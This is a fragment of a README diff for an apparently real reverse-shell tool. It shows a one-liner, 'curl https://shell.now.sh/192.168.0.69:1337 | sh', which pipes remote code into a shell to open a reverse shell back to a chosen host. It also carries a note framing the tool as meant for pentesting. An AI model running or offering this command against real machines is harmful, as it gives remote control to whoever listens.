lukechilds/reverse-shell/README.md

 curl https://shell.now.sh/192.168.0.69:1337 | sh
 ```

+Go back to your machine, you should now have a shell prompt.

 ### 3. Don't be a dick

 This is meant to be used for pentesting or helping coworkers understand why they should always lock their computers.
 Please don't use this for anything malicious.